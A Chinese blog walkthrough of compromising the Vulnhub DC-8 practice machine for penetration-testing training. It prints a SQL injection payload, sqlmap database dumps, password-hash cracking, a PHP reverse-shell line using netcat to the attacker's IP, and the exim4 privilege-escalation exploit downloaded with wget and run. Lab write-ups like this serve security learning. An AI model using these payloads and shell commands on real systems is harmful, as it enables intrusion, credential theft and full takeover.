DC-8靶机渗透测试详细教程

最新推荐文章于 2025-06-12 14:03:25 发布
原创 最新推荐文章于 2025-06-12 14:03:25 发布 · 2.4k 阅读 · 20 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#渗透测试 #网络安全 #DC-靶机 #kali linux

本文详细记录了从发现DC-8 web应用的SQL注入漏洞,到使用SQLMap、John进行密码破解,再到目录扫描、权限提升,最终通过利用exim4漏洞实现远程代码执行的过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

DC-8

DC-8下载:https://download.vulnhub.com/dc/DC-8.zip.torrent

攻击者kali:192.168.1.11

受害者DC-8:192.168.1.8

使用arp-scan -l 扫描出DC-8的IP地址

使用nmap扫描

nmap -sS -A -p- 192.168.1.8

得到22和80端口

进入到web界面

没有具体的重要信息

当点击旁边Details下面的内容的时候发现rul好像有sql注入

尝试手工注入

http://192.168.1.8/?nid=1%20and%20updatexml(1,concat(0x7e,database()),1)#

有注入漏洞

使用sqlmap注入

顺便温习一下sqlmap工具注入使用

sqlmap -u http://192.168.1.8/?nid=1 -–dbs   查看当前数据库

和手工注入一样显示的数据库是  d7db

sqlmap -u http://192.168.1.8/?nid=1 -D d7db --tables 爆出数据库的表

有users表肯定直接爆这个表

爆出 字段

sqlmap -u http://192.168.1.8/?nid=1 -D d7db -T users –dump

得到admin和john账号的hash值

那么接下来尝试使用john来爆一下这两个账号的hash值

john 是一款大受欢迎的、免费的开源软件、基于字典的密码破解工具。用于在已知密文的情况下尝试破解出明文的破解密码软件,支持目前大多数的加密算法,如 DES 、 MD4 、 MD5 等。 John 支持字典破解方式和暴力破解方式。它支持多种不同类型的系统架构,包括 Unix 、 Linux 、 Windows 、 DOS 模式、 BeOS 和 OpenVMS ,主要目的是破解不够牢固的 Unix/Linux 系统密码

在桌面创建一个dc8.txt的文本将两hash值写入

使用john命令爆

john --wordlist=/usr/share/john/password.lst --rules dc8.txt

得出了一个  turtle ,还有一个半天没出,估计很久

先下一步,扫描一下登录的目录

使用dirb目录扫描工具扫

最后的到的目录是/user

尝试使用admin和john登录

john登录成功

经过一番折腾后发现有可以写php代码的地方

来到这里将shell反弹代码写进去

<p>demon</p>

<?php

system("nc -e /bin/sh 192.168.1.11 4444");

?>

一定要先选PHP然在写代码进去

并且选择php

然后kali开启监听

web页面往下滑找到保存按钮

显示保存成功

点击VIEW

在这个界面填好内容,点击按钮提交

kali接收到反弹

开启交互

python -c 'import pty;pty.spawn("/bin/bash")'

尝试提权

find / -perm -u=s -type f 2>/dev/null

exim4 --version

查看版本是4.89的

漏洞库搜索一下

searchsploit exim 4 

直接使用这个4.87 -4.96

cat /usr/share/exploitdb/exploits/linux/local/46996.sh  

查看一下脚本

明天写脚本解释

将脚本复制到桌面,命名为DC8shell.sh

cp /usr/share/exploitdb/exploits/linux/local/46996.sh /root/桌面/DC8shell.sh

在使用vim打开

vim DC8shell.sh

到这里按键盘esc

然后按键盘shift+:

输入set ff=unix

回车,然后保存退出

使用python开启http服务

python -m http.server 8899

开启成功后可以在浏览器打开看看

然后选择刚刚复制的DC8shell.sh路径

回到控制终端

进入到tmp目录

cd /tmp

输入wget将地址粘贴进去,回车

下载成功

chmod 777 DC8shell.sh  给脚本权限

./DC8shell.sh -m netcat   执行脚本

拿到root权限

进入到root目录下拿到flag

DC-8总结

sql手工注入判断是否有sql注入漏洞

sqlmap工具注入使用,得到网站管理员的hash值

john对hash值的爆破使用

dirb目录扫描得到admin登录地址

找到可执行php代码的漏洞地方

使用php代码将shell反弹

<p>demon</p>

<?php

system("nc -e /bin/sh 192.168.1.11 4444");

?>

打开交互模式python -c 'import pty;pty.spawn("/bin/bash")'

尝试提权find / -perm -u=s -type f 2>/dev/null

发现exim4

查看exim4版本号

kali漏洞库查找searchsploit exim 4 

查看漏洞脚本并且使用提权

靶机DC-8详细渗透,适合新手渗透)
君莫hacker的博客
09-05 1万+
目录靶机DC-8详细渗透,适合新手渗透)0x01靶机描述0x02环境搭建1. 下载并导入靶机2. 查看网络适配器3. 启动靶机0x03靶机渗透一、 信息收集1. 主机发现2. 端口扫描3. 详细扫描4. 目录扫描5. gobuster目录扫描6. 网站指纹识别二、 漏洞挖掘手工sql注入1. 通过手工验证,此处url含有sql注入漏洞2. 判断字段数3. 判断显示位置4. 查看当前数据库5. 查找库d7db中所有的表6. 查找uesrs表中所有的列7. 查询表中的数据sqlmap自动化执行1. 查当前数
DC系列漏洞靶场-渗透测试学习复现(DC-8
W983079520的博客
12-10 2170
DC-8是一个易受攻击的实验环境,最终目的是让攻击者获得root权限,并读取flag。 本篇文档中用到了shell反弹和exim提权。 1 环境搭建 下载靶场文件,使用Vbox或者VM打开即可;攻击机使用kali-2020。 2 主机发现 使用Kali中的arp-scan工具扫描结果如下: 172.16.12.149为DC-8靶机的IP地址。 3 端口探测 探测使用nmap工具 端口扫描结果如下: 由扫描结果知开放端口有两个:22(SSH服务默认端口)和80(http默认端口)。
靶机渗透 | DC系列----DC-8
最新发布
2302_82311116的博客
06-12 744
DC-8渗透靶机详细复现,SQL注入拿下网站后台,然后进行反弹sehll,最后利用exim4漏洞提权
DC-8靶机渗透
whylon的博客
07-26 537
DC-8靶机渗透 文章目录DC-8靶机渗透信息收集漏洞利用获得shell提权 请勿用文章中的手段进行违法攻击,做守法公民,利用文中手段造成不良行为后果本文作者概不负责 信息收集 首先发现存活主机 发现目标主机ip为192.168.11.132,我们的kali ip为192.168.11.129,现在我们探测敏感目录 使用dirsearch工具首先没安装的要安装 apt-get install dirsearch #安装dirsearch dirsearch -u "http://192.168.11.13
DC-8靶机渗透过程
weixin_52766206的博客
08-11 344
对Vulnhub靶机DC-8进行渗透
渗透测试DC-8靶机
Ciyaso的博客
08-23 696
一、扫描获取靶机ip arp-scan -l 192.168.203.147 二、获取网站信息 1.nmap 开放22、80端口 2.Wappaloyzer CMS:Drupal Web服务器:Apache 访问网站 3.sqlmap 点击Details下的选项发现url的nid=会发生变化, 在1后面加一个单引号,发现报错,说明存在sql注入 使用sqlmap sqlmap -u http://192.168.203.147/?nid=1 爆库 sqlmap -u http://192.
DC-8靶机
m0_62094846的博客
07-07 354
ifconfig查找主机IP扫一波内网,探测下存活主机nmap 192.168.61.0/24使用nmap工具对DC-5靶机扫描开放的端口nmap -A -T4 192.168.61.137 -p- -oN nmap137.A点不同的选项,uid会变猜测有sql注入sqlmap -u "http://192.168.61.137/?nid=1"sqlmap -u "http://192.168.61.137/?nid=1" --dbs数据库:d7db 和 information_schemasqlmap -
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
DC-1靶机渗透测试
weixin_52003758的博客
03-17 517
DC-1靶机渗透测试
DC-6靶机渗透测试
m0_66225311的博客
08-05 654
又是一个远古靶机,最近又做了一做,发现可以直接用50110.py文件一把梭获取权限,不需要之前那么繁琐的用html文件来反弹shell了。第一次没能进行尝试,要不然就能搞点不一样的了
DC-5靶机渗透测试
m0_66225311的博客
08-11 992
远古靶机,心血来潮又打了一次,发现这里的文件包含获取shell的有了更简便的方式,所以重新编辑添加了利用PHP过滤链直接进行文件包含漏洞的RCE的方法,利用php_filter_chain_generator.py工具生成相应的RCE过滤链即可。界面,发现只是一个普通的界面,但是再次访问的时候,发现下面的标识发生了改变,猜测这个界面存在文件包含,通过刷新来随机访问某一个界面。
VulnHub靶机 DC-5 打靶 渗透测试详细过程
网络空间安全学习
04-18 1540
在访问/footer.php,/thankyou.php时发现跳转界面和原始界面的年份不一样,总是来回变动,刷新也会变动。目录爆破发现,存在file参数,尝试读取一下/etc/passwd文件,成功读取/etc/passwd文件并回显成功。当然既然知道了包含/footer.php文件,那么我们也可以去猜解参数,常用的如file,尝试一下即可,或者爆破。暴露出如下几个目录,去访问发现其中的目录,爆出的目录其中有一些界面为默认界面当中点击跳转的目录。给予sh文件执行权限,直接执行一下试试,成功提权。
DC-8靶机渗透测试
2302_77182305的博客
12-12 298
输入:cp /usr/share/exploitdb/exploits/linux/local/46996.sh 46996.sh。路径:/usr/share/exploitdb/exploits/linux/local/46996.sh。503 : 该状态码表明服务器暂时处于超负载或正在进行停机维护,现在无法处理请求。输入:searchsploit -p linux/local/46996.sh。(存在时间很短,手慢无)输入:find / -perm -4000 2>/dev/null。
DC靶机系列:DC-8
Ays.Ie的博客
02-28 340
本篇文章为DC系列第8靶机,该篇文章详细的记录了渗透的思路和整个渗透的过程,希望能够帮助到他人,同时加深自己的印象以及熟练自己的操作
DC8靶机渗透测试(个人学习记录)
m0_53806046的博客
03-24 1495
SUID位允许用户以文件所有者的身份执行文件,而不是以用户自己的权限执行。当一个文件设置了SUID位(4000)时,这意味着当用户执行该文件时,他们将以该文件的所有者身份执行,而不是以他们自己的用户身份执行。2>/dev/null:这部分是将标准错误(stderr)重定向到 /dev/null,这意味着任何错误消息(例如,无法访问的目录或文件)都会被忽略,不会显示在命令输出中。它是最常用的密码测试和破解程序之一,因为它将多个密码破解程序合并到一个软件包中,可以自动检测密码哈希类型,并包含可定制的破解器。
DC: 8靶机-Walkthrough
ins1ght的博客
09-26 867
DC: 8靶机,不知道是不是这个系列的最后一个靶机,后面会把DC:1~6的Walkthrough都放出来,啥时候不确定,但一定有。靶机做了一些之后就发现“信息收集是王道,注意细节是魔鬼”,尤其这个靶机,真的是细节是魔鬼????。enjoy
靶机9 DC-8(过程超详细
honest_gg的博客
09-26 3711
DC靶场一共有9个,对于学习渗透测试人员,有很大的帮助,是非常不错的靶场。
DC8靶机
qq_40646572的博客
05-13 449
信息收集 开启dc8靶机 使用nmap扫描下当前网段。发现存在dc8靶机192.168.85.139主机。且主机开启了22端口以及80端口。 打开http服务。 web——getshell 经过测试,在home页面中,点击侧边栏,存在nid参数,经过测试该处存在sql注入点。 经过测试,当前数据表存在一个字段。 使用联合注入的方式获取到当前数据库名,d7db。 获取当前数据库的表个信息。看到当前数据库存在users数据表格。 Payload= nid=-1 union select gr
DC8-靶机
Au
12-22 2445
下载地址 配置的环境: kali:192.168.25.131 DC8-靶机kali 在同一C段 渗透 nmap扫描网段,发现存活主机 nmap -sP 192.168.25.0/24 发现主机192.168.25.129,判定为DC8-靶机,继续使用nmap获取详细信息 nmap -A -p 1-65535 192.168.25...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

啊醒

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值